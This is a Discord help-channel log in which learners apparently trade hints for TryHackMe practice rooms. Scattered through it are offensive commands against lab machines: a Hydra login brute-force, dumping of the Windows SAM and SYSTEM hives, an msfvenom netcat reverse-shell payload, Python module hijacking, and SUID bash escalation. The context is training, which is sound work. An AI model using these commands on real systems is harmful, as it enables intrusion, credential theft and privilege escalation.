#room-hints
hey, i need a little help for OWASP juice shop room
help w/ wot
i'm using burpsuite
and in second last question i have to edit a custom header but in burp i cant find any option for that
please help
@white salmon ?
Perform a persistent XSS! this one
so you cant find the true-client-ip header with ur request?
you've gone to last login ip and then caught the logout request with burp?
i'm not able to find 'header' tab so how can i add a new header value
@white salmon
ok lemme c something rl quick
ok
ok
where i can find inspector option
under site map
ok let me see thank you
but shouldnt you just be able to intercept the request and change it in the intercept window
but nah u can see inspector in intercept window too
its on the right side
u can add to the request headers from here
ok thanks for the help
np
Hello I'm having some problems with crack the hash room.
Part2 4: hashcat.exe -m 1800 $6$rounds=5$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02. rockyou.txt
But the result is exhausted :/
I think that's invalid format. I think you need to pass in a flag for the wordlist (-w maybe? Not sure). but also, the $ in the hash is probably breaking things- it's trying to insert variables when it sees that.
Either wrap them in quotes (" $hash stuff "), or put it into a file and pass that file in to hashcat
that's the wordlist to try to use to crack it, but I'm pretty sure it requires an extra flag first
can you send it like screenshot because imgur is blocked in my country
that
!docs verify
no press the link
click the link in embed
click on the link and follow the instruction
does it not say answer above that
is rockyou.txt in your current directory
i usually use it from /usr/share/wordlists/rockyou.txt
Yeah, i'm using hashcat on windows, so I have it in the same folder as hashcat.exe
hmm
just use $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.
as the hash
Ok, I'll try that. I was using rounds=5 because that number appeared in the room. Let's see if this works. Thanks
I guess that should work
so i am in room nmap from networks and i wanted to ask how do u check the dependencies of a script ?
open the script in a text editor
there will be a dependencies field
oh thanks
Gave +1 Rep to @slender dawn
@slender dawn so i did nano the file
and
```lua
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local os = require "os"
local datetime = require "datetime"

description = [[
Attempts to determine the operating system, computer name, domain, workgroup, and current
time over the SMB protocol (ports 445 or 139).
This is done by starting a session with the anonymous
account (or with a proper user account, if one is given; it likely doesn't make
a difference); in response to a session starting, the server will send back all this
information.
The following fields may be included in the output, depending on the
circumstances (e.g. the workgroup name is mutually exclusive with domain and forest
names) and the information available:
* OS
* Computer name
* Domain name
* Forest name
* FQDN
* NetBIOS computer name
* NetBIOS domain name
* Workgroup
* System time
Some systems, like Samba, will blank out their name (and only send their domain).
Other systems (like embedded printers) will simply leave out the information. Other
systems will blank out various pieces (some will send back 0 for the current
time, for example).
If this script is used in conjunction with version detection it can augment the
standard nmap version detection information with data that this script has discovered.
Retrieving the name and operating system of a server is a vital step in targeting
an attack against it, and this script makes that retrieval easy. Additionally, if
a penetration tester is choosing between multiple targets, the time can help identify
servers that are being poorly maintained (for more information/random thoughts on
using the time, see http://www.skullsecurity.org/blog/?p=76).
```
i got this but i dont see the dependencies file
Dependencies are mentioned in the file, grep can be useful.
ya found it thanks
thanks
That seems like it's just spoiling the answer so I'm gonna delete that
hello guys
the upload vulnerabilities room target machine keeps bugging on me
for some reason i cant access the websites provided by the room
i pinged the machine ip and it was connected
i checked my openvpn and it connected
so i thought maybe my browser may be bugging
changed it but nothing happened
has anyone faced any kind of similar issue?
You can't access it by IP, please describe what you're doing and what's not working.
did u modify ur /etc/hosts file as indicated at the start of the room?
so the room requires you to get flags, right. by bypassing uploads
i did the first flag on the first website given by the room
i solved it but it was super super slow
and the website kept lagging
on the other rooms tho
i cant even open em
Please run the script
You need to be willing to troubleshoot and work with us, otherwise you don't stand a chance of getting it fixed.
no sorry thx,
and a ping, is an icmp request yes
The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information indicating success or failure when communicating with another IP address, for example, an error is indicated when a requested service is not ava...
so how do i add spoiler thing
on discord
okay got it
| so i am doing nmap room and its practical section 1st question , which says does the machine target respond and when i do the nmap scan to check if it does its , it actually does but the answer is No|
what why dint it go inside a spoiler thing
yes
so nmap task 14 question 1
does it respond to ping however?
no it does not respond to ping
so whats the answer to the actual question
N
but this is a nmap section so isnt it that i have to use nmap commands to find the ans
well, if you note the next question it tells you exactly what to do right
the first question had (ping) in brackets
it didn't say "perform a ping scan" specifically
I can see why it might be a bit misleading however
ya i understood that i had to use ping i did that but since it was not from the same library i wanted to check it out from nmap
but okay fair enough
you can read further on what the nmap Ping Scan does but its not the same as a standard ping (ICMP Echo request)
cool thanks a lot
Gave +1 Rep to @silver otter
Hello, I'm doing the HackPark room, and when I use Hydra, it ends up providing about 15 passwords that are found, but none of them work. Looking at some of the write ups I can see that I'm using the same syntax for hydra to get the cracked password, but it instantly gives me the 15 or so passwords each time now. Any ideas? Here is my hydra command
||hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.56.228 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=85ix11j%2BxrIRQvDXJxtbFlSllwg%2FCZVpgnJY789qA4Vnf7Ib7upzljVVyFeE5GmewVamjOy69epZ1GAii9ecq2P7iVSrbaASoDmBh71qza5%2FdvYyx7n784Co0ZlqPSajsFYBlo1ev8GP4ypj64IRHgxFo19Z0KLaH3M%2FtsHzncvFQa6IFkyM1ENQ3DDK38hmb%2Fi%2BMOwP5lcS%2BEc%2Fn9xPJi2Nb4Md3Fbxg53PY1K2EnX6JkfBQGCvgNsGv3vogXobbBYWRWLo0qCjxBVTmhXNX4gDsVsJxKWaGbEJfJrZS9h2eEo%2Fa0VHXhGkI9Q1zvGNPoYz01yRHL4fsEkCm%2FMvVWJ4yJn14pl%2FrOunbBKCHCcjOdBO&__EVENTVALIDATION=Y2aOZI3SznMjV2AV9APTR%2F4TK9WJxbF2x114jb7iaY8tDgDDAYNn1tIG%2BC1zLAYR4sJuoI3CYymYDO9PPXFyjMNlLElWWmvGuyBdbo0lQ7qY67iGahiUL%2BWiAzXe099KfdT%2FD78woJ8NoxnjWr6NKJXNWADf8b5BRjPaSb%2FC7Sa6pOyX&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Fail Login"||
it's really long to see properly, but are you sure the last part is right?
by last part i mean the error message you are giving hydra
Yeah it's pretty much identical to the walk through. One thing I noticed though is that it seems like Hydra keeps a cache file of the overall process of the crack? I actually already cracked this in the afternoon. So is it skipping over the correct answer because it's somewhere in the cached file? I'm trying to figure out how to see that file now.
i'm not sure, but i'm looking at the video that was made for this room, and the failed login message is different to what you have provided
Oh Login Failed instead of Fail Login?
nice
Hmm I thought that could be any message, let me give that a shot
ya that'll work
nah so that last bit is looking for anything in the html that is unique when you provide wrong credentials
ohhhh ok that makes sense
And sure enough it's taking longer now that I've updated that. I'm guessing it'll find the right password now, thanks for the help!
no problem :)
and just to provide more insight into your previous command, the reason it was showing every password as correct is because "Fail Login" never appeared in any of the responses, so it assumed they were all valid
Ahh thanks for helping me connect the dots!
Gave +1 Rep to @digital iris
I am getting started with my first AD machine. Going after Attacktive Directory, but I am stuck on which tool to use for enumerating NetBIOS. Any ideas?
Figured it out because I was being dumb...lol😒
```
use mysql;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-A
use mysql' at line 1
mysql>
```
how can i solve this problem ?
Try it again. It was counting -A from a previous line as part of the command.
I've completed the Intro To Python room, but I don't understand the difference in the problem I had.
I completed the challenge by changing from a while loop to a for loop, but don't understand why the while loop affected it.
Different Implementations:
```python
for i in range(0,5):
    DecodedStep = base64.b16decode(DecodedFlag)
    DecodedFlag = DecodedStep
```
(Success)
```python
i = 0
while i < 5:
    DecodedStep = base64.b16decode(DecodedFlag)
    DecodedFlag = DecodedStep
    i+=1
```
(Failed)
Error:
```
Non-base16 digit found
File "/home/coreyo/Downloads/pyproject/Intro to python.py", line 13, in <module>
    DecodedStep = base64.b16decode(DecodedFlag)
```
i don't see that you're incrementing i during while. Means i will always be < 5
Ahh, I forgot to add it back in
btw it's enough if you write range(5) instead of range(0,5) 
it will always start with 0
Ahh nice, I was just following from documentation I read
problem solved
well done
@tight fulcrum No you're right lol, maybe I had something else wrong when iterating while beforehand
Thanks mate!
Quick question: when I type in a shell for example bash or python, if the executable with the given name is present in the current directory, shouldn't it directly run it? (Without trying to find it in PATH).
I can directly tell it to look into current directory by appending ./, but shouldn't directly bash or python also try to lookup in current directory first, and then try to find an executable in PATH?
No
PowerShell won't look in the current dir either
adventofcyber last day, question hint said root.txt was in /root but its not? is it possible someone could have deleted it?
You don't share machines with other people on THM, outside of Networks or koth.
is there a way to set multiple options in msfconsole at the same time? for example, say I want to set lhost = tun0 and lport = 4445. i'm trying to do something like set lhost tun0; set lport 4445, but then that just ends up setting lhost to tun0 set lport 4445, just wondering if I can set multiple at once to save time
I'm not sure. But you can globally set options, lhost is a good one for that
in Year of the Fox ||the passwords are dynamic||, aren't they?
yes
that's not fair u.u
go yell at @inland onyx then, he feeds off the tears of the suffering
haha well said
I've been stuck on the eternal blue attack! I literally cannot get a meterpreter session started for the life of me, im specifically at the "sometimes it works sometimes it doesnt " part arggg heres a screenshot thanks in advance
i have transferred the sam and system files from windows to linux (i m doing blueprint room)
how can i get their hashes now
i tried samdump2 but i m getting segmentation fault
crackmapexec is also not working
Is this for Wreath?
no i m doing blueprint room
Ah, wreath has a nice section on it
no i mean i tried to use mimikatz on blueprint
but couldnt find a x86 mimikatz
i m not using metasploit
reg save hklm\sam c:\sam
reg save hklm\system c:\system
and that's how i dumped them
and then transferred both sam and system to kali
and then tried samdump2 but it is not working
i m getting segmentation fault
try putting LOCAL at the end of the secretsdump command
its after a "target" as it says
hello so i am doing "network services" room and i am stuck at task 4 3rd question does the share allow anonymous access what am i supposed to connect to? and the attack box has no secret file
anyone please
You need to deploy the correct target machine
Ya so i did deploy the target machine but what is the file ?
What file?
oh okay
let me try ,thanks
hey so i am doing is smbclient//ipofthemachine//profiles -U Anonymous -p 80 is anything wrong
?
Yes
You are missing a space.
If it's not working, clearly something is wrong.
I don't know why you're specifying port 80 either, there's no reason to do that
spaces where ?
because last question asked to input default port
So where the heck did you get 80 from?
so will it be smbclient //ip/share?
That's part of it
isnt 80 the default port
No
80 is the default port for HTTP.
You're not doing HTTP
You also do not need to specify the port if it is the default
ya got it
thanks a lot my 80 port was the issue
Gave +1 Rep to @stuck fractal
thanks a lot
It was more than that
yep and its asking for a password was it meant to?
Screenshots
ya one sec
If you want help, we need to know what you're doing and what you're seeing
ya no issue
here
Press enter
okay
connection disconnected
Screenshot
@stuck fractal
I'm a bit confused on the last question for task 8 in the SQLi-Labs room. I've entered in every flag listed in the table, followed the same format for the 1st question in that section, but I am still a bit stumped
Regarding how to list all databases on the website listed in the previous question
got it , it was space and enter
i dint get u ?
see
oh okay
I'm not arguing with the fact it worked
I'm saying that was not the password, there was no password
oh okay, thanks a lot for the help.
Gave +1 Rep to @stuck fractal
Nevermind on this, the answer wasn't in the table that was referenced in the question
still a great room though!
hey guys , how do i enter the profile ? i am doing cd but doesn't work
That is not a directory, it is a file
It is also not the file you're interested in
but the question does ask me whose profile is there
Are smb commands different compared to linux
Yes
Feel free to ignore my advice, but I've completed the room 3+ times
no no i dint mean to sorry
I recommend googling "How to use smbclient"
thanks a lot found my answer, i never knew smb had a different command
Gave +1 Rep to @stuck fractal
hey so i need small help with task 4 from "network service" stuck in the last problem , i download the id_rsa onto my local host and when i ssh "first question the ip address is machine address rite ?" second what am i suppose to do i did ssh to cactus@machine ip it ask for a password
you need to do "-i id_rsa" in the command to use the cert
whats that basically? if u dont mind
it tells ssh to reference the id_rsa key for login, otherwise you would be requested for user login
Not necessarily
okay
thanks
Gave +1 Rep to @glacial gust
np
how do u know if u have to use this command ?
It's a key, not a cert
Seems pedantic but it's important to be when you're doing crypto
you can only use if you have an rsa key for the user
soo ssh username@ip -i id_key rite?
yup
oh nice is it alright to ask like this and solve ?
so its an encrypted key rite?
If it asks you for a passphrase then yes
This key is not encrypted
It's a cryptographic key, but it's not encrypted
oh okay
i am getting this anyclue
unprotected private key
Did you google the error?
no i will do it now
Please do that before asking here
Done thanks a lot
Gave +1 Rep to @stuck fractal
thanks you too
no support channel for the latest room ?
doesn't look created yet, strangely enough it doesn't even show up in my "new rooms" feed
strange. It was shown here in announcement
but it does seem like it is related to some udemy training so might be the reason
It’s been out for a bit but it’s dedicated to nahams udemy course
Yea, naham has a support channel for it in his discord
Yea but it might be hard to follow if you don’t have the course and the course is a bit costly but makes sense why it’s that price
interesting.
@steady elm is it nahamsec intro to bughunting?
I have free udemy access so I might as well join that course 🙂
"test" already existed when i started this machine and im not getting the same output when following along with the video... what am i doing wrong 
Please show us what you're doing and what you are getting then, if it's not the same as the video
first thing i did was ls, test is already there, you can also see where i attempted to mkdir test anyway
Where's the problem?
The directory already exists, that's fine
It's a bug with the room, but it does not stop you from continuing
You're getting exactly the same thing as the video.
ok, so just step over mkdir test and proceed?
where did we learn this, or am i supposed to have figured all this out myself?
You were taught the find command
You can also google for "Linux hide errors from command"
??
i understand whats going on up to that point, i guess i dont know how i was supposed to know to google "hide errors" in the first place
i feel like some supplementation is required
Correct, with your own research
> i guess i dont know how i was supposed to know to google "hide errors" in the first place
Because you get a whole bunch of errors without
i just know how im supposed to have known that was even a thing to be researched...
You got spammed with errors
but nothing ive been taught so far would have led me to believe thats a thing i could have mitigated.. like everything else has been intuitive up to this point
its not like weve really been taught how to interpret the output
everything is google-able :). If you ever encounter a situation where your instincts tell you "huh, that's weird", or "I'm lost", that's a good candidate for google/other research
or also "there's gotta be an easier/better way to do this"
idk i feel ill prepared... like here is a few commands, no understanding of the output and im just supposed to know what to even google
there are also the man pages- always a great resource
definitely, as a complete beginner, it can be hard asking a "good" or "intelligent" question, but there's also documentation to read, which usually provides a lot of extra context
i man everything, the output doesnt even say "error" otherwise id have googled the error code it says permission denied..
i feel like im getting through this without really understanding all of it and just getting deeper and deeper.
what should i have googled to understand what im doing? like i dont even know that at this point.
well, in the case of the 2>/dev/null thing, if your thought is "I have no idea what that means", just google the entire thing, and see what pops up. That will often give you enough information to ask further questions
In my case, when I google that, the first result is: https://askubuntu.com/questions/350208/what-does-2-dev-null-mean
that explains what 1, 2, and /dev/null are, as well as >
ok, i can absolutely do that now, but had i not watched the video i would not have even seen that to be googled.. you see what i mean? i dont want to "cheat" i want to do the work and understand it i just dont see how i could have arrived at this point on my own
I wouldn't think of it as cheating, as long as you are learning. Think of it like peeling back an onion- as you learn more, you can go a little bit deeper. It takes time. A lot of time. It's not easy, it takes a lot of determination, trial&error, and figuring things out
I can't tell you how many times I wasted hours going down a rabbit hole and the solution was something stupidly simple, had I just known. But the key there is: LEARN from those experiences. You struggle, you learn something new. Make a note of it, and next time, that piece will be easier, and you'll instead struggle with something entirely different.
dont get me wrong, im definitely learning and i dont view it as actually cheating. Just lacked better phrasing. I just feel like i should be able to arrive at the solution with the things i have been taught without having to watch the video and i dont see how i could have done that.
walkthrough rooms are meant to be instructional, but they can't/don't teach you EVERYTHING. Some of it is because the room creators want you to go research on your own, some of it is because the room might be outdated, some of it is because the creators might assume you know more than you do
the biggest/most important skill you can develop is researching and figuring stuff out. Sometimes that's a lot of googling, sometimes it's just trial and error. Kinda depends.
but ultimately, everything starts with a question, an "I don't know" moment. Then you have to figure out how to gain some new knowledge that helps you solve the problem
Don't get discouraged :).
... alright, im gonna get back in there. i appreciate your help
🙂
another approach- sometimes it helps to take a break. And list "here are the resources I have/things I know" as well as "here is what I am trying to achieve". In a lot of these simple rooms, it'll be something like "I know ssh is enabled, and I have a username" and "I don't have a password, but I want to log in with ssh"
and when you identify that gap, then you have something to work on. Maybe there's a tool that does that. Then you have to go learn a new tool. Stuff like that.
I'll try to keep that in mind, thanks again 🙂
Gave +1 Rep to @worn otter
@dry briar here's a good website which explains commands https://explainshell.com/
match command-line arguments to their help text
just type in your commands and it will tell you what each parameter does
You're welcome 🙂
Did you ever find the solution ?
No, I just grabbed the flag from a blog
I think i understand this method and technique already much so, can you DM link to blog please ? 😦
Just go to one of the write ups of this room and you'll find it
Which blog did you read ? I didn't see any writeups
Are you guys stuck on the first entry in task 7 or the second?
Second
Question #2
Google?
nevermind... was just mounting error. Worked fine with remounting. Thanks
That's what i'm expecting but I see no flag
after u logout?
Are you referring to Task 7 question #2 in the Juice Shop Room?
yea click on that link
this one
u can see i am logged out
yeah not sure why it's not doing the same on my end
hmm ig there is a problem
cuz someone was saying the same when i posted that ss as well
EmptyBuffer — Today at 7:19 PM
that's not the flag that I have in my notes
so either it's changed/dynamic, or you got the flag for doing something else
In my notes, that's the flag for error handling not done gracefully
so- congrats on causing an error in the backend 🙂
the flag I got for that question started with a 23 and ended with a a0
Good luck with it :). I'm afk for a while
That's what EmptyBuffer said earlier
Same thing is happening for question #3 Task 7 in Juice Shop...
in Year of the Fox ||the privileges scaling goes on the side of the PATH environment variable||, isn't it? ||the output of sudo -l is different in my system||...
Hi, I am doing the JuiceShop, par three, "question" 2 is really a statement, I don't understand what I suppose to submit
"Question #2: Log into the Bender account!"
It's not necessary to be sarcastic, here we are all volunteers, if nobody answered your question it is because probably nobody has read it or we did not make the room you are making
It's just fun, no worries 😄
But to be honest, someone could edit the room and add some more specific questions.
they're more tasks than questions, and the Juice Shop will give you flags as you complete them
a question might throw people off more, as they're more likely to answer the question rather than input the flag
Pls i need hint in the room OhSINT
I've managed to figure all the tasks out apart from the last, password part
I'm really unsure how I'd get the password?
to get the answer, back to the source you must go..
look for a "pennY" in the blog? 
Thank you both, I'm pretty sure I can find it now with some looking
bet you will
Hey I was doing room wonderland... I got the ssh shell, any hints how to escalate from alice to rabbit? It doesn't seem that I can manipulate PYTHONPATH, or anything else with that python file given... (just using random module)
Ps: Try to give least hint possible 😅 I liked the theme of this box ❤️ and want to pull it off myself
Look at how imports work, by default.
You can't edit the script itself, but you can do something similar to what you're thinking about
Hmm alright, thx ✌️ lemme see it
Ok, I get it, ||I have to create a custom random module in my home directory (but I wonder if the rabbit's path is going to random in my directory 🤔 ||
Moreover, here's my code I did provide executable permissions to custom random file I created with nano in my alice's home directory... And here's the code... Can anybody plzz guide me what's wrong in this 😅 It doesn't seem to work
```python
import os
class Random(random.Random):
    def choice(self,seq):
        os.system('sleep 5')
        return 1
```
Their PATH doesn't matter, it's in the cwd which doesn't change
No class required, importing random.random means the function random from the module random
When you import a module, it'll run all the top level code as soon as it's imported
It'll then allow you to call functions defined in the module, with the module as the prefix if you don't import a specific function
ohh I see... Let me try a simple code then...
Hah, it did execute... right there, first line of output... Lovely ❤️
Yep, and you can define choice if you want it to error out less
thx so much ❣️
Yeaa... Infact...
This, now makes sense
Hope you enjoy the rest of the box!
Sure, will let know when rooted 😃
hahaha, this room had me solving Bof for the teaparty binary 😂 well designed @stuck fractal (This was cruel 😈 )
well glad you didn't... I suck at bofs
but now at hatter
nice one 👍
so where should I aim for next? tryhackme user or root?
Just confused now... Coz there's nothing more I could find with enumeration?
tryhackme is the user I used to create the box
You should not be able to get that user until you get root
You've seen it previously, you just couldn't use it
Assuming you ran linpeas
hmm, doesn't ring any bells... May be I should try to re-look the path I came? N yes, I ran linpeas, It showed a localservice running on 53 (assuming dns) but not much idea (should I head that way?)
Linpeas will highlight something in big red angry letters
No
It is something reasonably basic, but you couldn't exploit it until you got to this user
ohh, I see... lemme look through the output once again
ok I don't know what this means, but I did find perl within a group of hatter (and that's not default 😏 )
does that mean something? coz it's not an suid either and no write permissions 🤔
Is it not?
Check again 😉
I am sure about not having the suid/sgid permissions
I'm not sure you are looking for that with the right command
Ohh I am actually a little confused... What is the difference between normal SETUID and a CAP_SETUID.
I did find these with linpeas (ran again)
Capabilities are an alternative to SUID
They provide much more granular control over what a program can do
Like you can add cap net bind to a process to allow it to bind to ports under 1024 without running as root.
The idea is to have less code running as root and to not grant more privileges than a program needs
Least priv model
Ohhh, I didn't know bout this... So we can allot suid permissions to an elf without giving u+s. It's actually... Impressive 🔥
Well designed sirr 
Yeah, SUID permissions (+s) work in a very similar way as cap setuid
Capabilities are spicy
And I copied that long command from gtfo... But this was srsly such a nice box ❤️
thanks for helping @stuck fractal you got any other recommendations? Like this box?
Gave +1 Rep to @stuck fractal
Looking Glass is the direct sequel
I have a 3rd instalment partly planned out that's a good step up in difficulty
Ahh, I love sequels... ❤️
hello I'm a new user on tryhackme, I'm stuck at a question
We're going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us. Here's our syntax:
"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"
-p = payload
lhost = our local host IP address (this is your machine's IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format
What word does the generated payload start with?
I had an error
"Error: One or more options failed to validate: LPORT."
can someone help me ? plz I'm a beginner 🥲
This [local tun0 ip] is not a thing in actual, it's a reference that you should input the tun0 ip here.
You can find your ip using ifconfig tun0 or ip addr s tun0 once you get that ip... input it in place of lhost
it also shows on the THM access page, or on the header of the room page you are on
Ok thank you I see
Gave +1 Rep to @solemn onyx
L
Hello, I'm doing Year of the rabbit, anyone can give me hints? I'm having problems with privesc
What have you tried so far?
I know i can change between users. But I cant find what to do after that.
No cron jobs or processes that I think I can use
I think maybe Im complicating things haha
Did you try any Priv. Esc. Script? @dreamy skiff
I used lse and LinEnum. Maybe im not reading them thoroughly.
I was reading about Capabilities now.
Take a close look at ||sudo version||
I tried a bit of that, after looking at the version. But got some errors. Maybe I mistyped.
I'll investigate more
thanks
Search that version and read the articles carefully!
Guys what does this question mean ? From task 3 and question 3 from network service 2 now . Use /use/sbin/showmount ....... please let me know thanks I searched Google haven't gotten any hint
By using showmount binary, you can list the NFS shares.
I'm trying to submit a zero-star review in the OWASP Juice shop and I have no idea how to do that. Can someone give me a starting point?
So it should be showmount /use/share /showmount -e IP?
There are tons of articles about that. Search it up on Google. 🙂
No, showmount is a binary. Just like nmap. Therefore you can use showmount -e.
With /usr/share/showmount, you are actually executing the binary from its location.
Oh got it
Okay got it got it thanks
Welcome! 🙂
But it says export list for IP
/Home *
What does that mean
* means everyone can mount that share. If in place of * there would be an IP, then that means only that IP Address can mount the /home share.
Okay thanks a lot
Gave +1 Rep to @halcyon sequoia
You're very welcome!
@white salmon hey so I reached till question 6" interesting let's do it " so it says I have to look into the folder
And when I look into the folder nothing is there
I did list all its total 0
What was the command you used to mount? Did it give any error?
Share screenshots.
No it dint give any error infact I got the name of the folder
Ya one sec
Here is the image
Okay cool
One more thing nmap is too slow anything fast ?
Rustscan
It does the same thing ?
Yep.
Scans 65535 ports in less than a minute I guess.
@bold lichen https://github.com/RustScan/RustScan
Facing the same issue
I am solving room battery. https://tryhackme.com/room/battery
found an admin login panel, logged in with default creds ||admin:pass||. Still can't execute commands, it says only admin can execute commands. Also tried by disabling javascript but still no good. Any hints would be highly appreciated! Thanks in advance 😊
@true widget Did you try gobuster on port 80?
Can someone give me a hint for the archangel room.... I know there is a directory named ||flag|| but the page there redirects to youtube... tried to intercept the redirection with burpsuite but no help
Disable something that start with J...
@white salmon yes I did that, that's how I got to that banking application. I also got a binary too but can't figure it out
@true widget Try ||RE on binary?||
Room: Blog (wordpress 5.0 exploit executed successfully but the PoC link generated is not giving command execution)
Any hints what can I be doing wrong? I got the username and the password... The image I uploaded is also opening in the page source (gibberish) just not executing commands
@white salmon I tried with ghidra. But being honest I am a beginner in RE stuff. But I'll give it one more try 🤘
@true widget You will get it, it's easy.
It's not the name of the person
Room: VulnNet: Internal... I got the first flag (service-flag) but I'm stuck at the internal flag. I just can't find any resources on the services that I can access without credentials (except the one where I got the service flag). Does anyone have a hint? 😅
hey i need some help
with task 7
sorry wrong image
this is the image
so I got the username and stuff and I applied it to hydra and tried to run as mentioned in the task, but it keeps saying it can't connect to the network
@white salmon
what happens if you just type ssh administrator@ipaddress ?
you didn't say what room this is
network service 2
it sounds like ssh might not be on default port or you can't talk to the target
yep it's on port 25
25?
I guess, since it's an smtp room
that's not default ssh so I doubt hydra knows
okay let me change and see
same issue, I changed the port to 25, nothing happened
screenshot
yep
and try not to blur the syntax of the command with scribbles lol
ip is fine as long as you get it correct, it seems to respond
what happens when you just try to ssh without hydra
(on port 25)
let me try, but since the room said to do it with hydra my initial was hydra
yeah but now you need to troubleshoot your connectivity to ensure its working ok
it says could not connect, no port 25 exists
Is the IP of machine correct? Also, are you sure that the SSH port is 25? @bold lichen
yep 'cause it's an smtp server so it should be 25
just because it is running an smtp server
Hello 👋 - For VulnNet: Internal, does anyone have a nudge/hint for the user flag? Trying to get RCE but ran out of ideas
doesn't mean it can't run ssh on another port
okay
Hey, are you sure the IP of the machine is correct?
okay no issue
it's not like someone will steal your chance to hack it
If IP is correct, then maybe try resetting the box. Just in case.
and ensure you are on the VPN
Where are you at?
using attack box
I guess, he is using attackbox
yep
oh I see
166
No worries, things like this happen.
all g
so sorry guys, I am really sorry
Uhuh, It's alright!
well, put it this way, I bet you won't make that mistake again in a hurry
thanks @white salmon and @silver otter
Gave +1 Rep to @halcyon sequoia
Now, tell us if it's working.
ye, one sec
now my attack box has hung
gonna use local skali
kali
by the way I checked man and tried to understand hydra task, what does it do? is it like multithreading
-t is threads I think yes
so like multithreading, right, sending multiple requests at a time
yeah, something like that
getting the same issue
are you connected to the VPN?
yep
can you try ssh
okay
if that doesn't work either ensure you can browse to 10.10.10.10
kind of strange
yep, even the attack box is lagging for me, which never happens
and this isn't connection
connecting
now atb is running
it runs the command but doesn't connect to the ssh
should I restart the server?
yeah probably
cool
it is quite strange
when the box is back up (after waiting 5 - 7 mins cos it's windows afaik?)
try ssh first
yea, can someone already take the access and change something, is that possible
thank you
Gave +1 Rep to @silver otter
it might be if it was one of the cool kids like CMNatic but I don't think so typically
maybe haha, but tryhackme is so much fun dude, in the previous tasks like nfs and all I did take a small help in smtp, I never did metasploit and my god I googled stuff, how to use metasploit and stuff, man this has been so good
hahah, yeah it's a great platform for learning no doubt!
I kind of somewhat wish it wasn't called tryhackme because it kind of lends itself to sounding less professional than it is
it's perfect, I am enjoying it a lot and I feel this is a great field
I ignored it for so long but now I am so happy I did it again
you'll never have to resort to being a killerthief again!
haha true
back to thm have to finish this beautiful room
Hello,
If there is anyone who can give me a hint with Network service 2 - task 4 "exploring NFS"? Please send me a message.
When running the script './bash -p', I am expecting my privilege to escalate to "root". Unfortunately, I am still a normal user. The permission for the bash file is "rwsr-sr-x". As shown below:
cappucino@polonfs:~$ whoami
cappucino
cappucino@polonfs:~$ ./bash -p
cappucino@polonfs:~$ whoami
cappucino
cappucino@polonfs:~$ id
uid=1000(cappucino) gid=1000(cappucino) groups=1000(cappucino),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
cappucino@polonfs:~$ ls
bash
cappucino@polonfs:~$ ls -al
total 1124
drwxr-xr-x 5 cappucino cappucino 4096 Apr 30 11:03 .
drwxr-xr-x 3 root root 4096 Apr 21 2020 ..
-rwsr-sr-x 1 cappucino cappucino 1113504 Apr 30 11:03 bash
-rw------- 1 cappucino cappucino 5 Jun 4 2020 .bash_history
-rw-r--r-- 1 cappucino cappucino 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 cappucino cappucino 3771 Apr 4 2018 .bashrc
drwx------ 2 cappucino cappucino 4096 Apr 22 2020 .cache
drwx------ 3 cappucino cappucino 4096 Apr 22 2020 .gnupg
-rw-r--r-- 1 cappucino cappucino 807 Apr 4 2018 .profile
drwx------ 2 cappucino cappucino 4096 Apr 22 2020 .ssh
-rw-r--r-- 1 cappucino cappucino 0 Apr 22 2020 .sudo_as_admin_successful
It looks like the bash file is corrupted. Do you have any idea, what can be the issue?
oh I did this today
once you're in the cappucino, use chmod +s bash
yes chmod +s bash , will change the permission of the file to "-rwsr-sr-x"
no, you have to get the permission as shown in the question
https://www.redhat.com/sysadmin/suid-sgid-sticky-bit check this out it explains suid
@white salmon helped me with this task
I believe the permission is "-rwsr-sr-x" . The answer was accepted
after executing "./bash -p". I expect my privilege to escalate to root
cappucino@polonfs:~$ ./bash -p
cappucino@polonfs:~$ whoami
cappucino
cappucino@polonfs:~$ id
uid=1000(cappucino) gid=1000(cappucino) groups=1000(cappucino),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
cappucino@polonfs:~$ ls
Unfortunately, I am still "cappucino". I wonder if the bash file is corrupted 😩
after running ./bash -p, were you successful in escalating your privilege to root?
From your local machine copy /bash to the shared folder path, give it permissions so cappucino can also execute it.
In polonfs machine, go to the shared folder path and execute bash.
Ok, thanks. I might miss that step. I will try that
Gave +1 Rep to @halcyon sequoia
Make sure it's owned by root
Are we allowed to ask for help on VulnNet Internal here?
guys, a basic question I wanted to ask, so it's from network service 2 and task 9 and it says username in the question, now is this the username I did try and I got access denied for user, so does it mean this is the username or no
the one with auth plugin name: mysql_native_password, is this the username
I don't think so
I think you need to read the room notes again
for that section
specifically the paragraph labelled "The Scenario"
alright
haaa got it thanks
Gave +1 Rep to @silver otter
whats wrong here ?
a few things, search it again and you can do use 0
or, use auxiliary/admin/mysql/mysql_sql
you wrote auxilllary/scanner/mysql/mysql_sql
ya, later I corrected it
YEP, done it now, thanks a lot
Gave +1 Rep to @silver otter
excellent
Been away for a little bit...is Vulnnet:Internal still under embargo?
I don't know. They've modified the discord since I was last here.
I'm looking for a nudge on PrivEsc for the "easy" Vulnnet:Internal
Is the creator of vuln net series in here? I have a question about the intended priv esc but don’t want to spoil the embargo. I’ve finished the room but don’t want to ruin the embargo
I can’t find them
Can I DM you?
Go for it, but the room is still under embargo until tomorrow, at least I think
@white salmon the name of the room is "VulnNet: Internal"
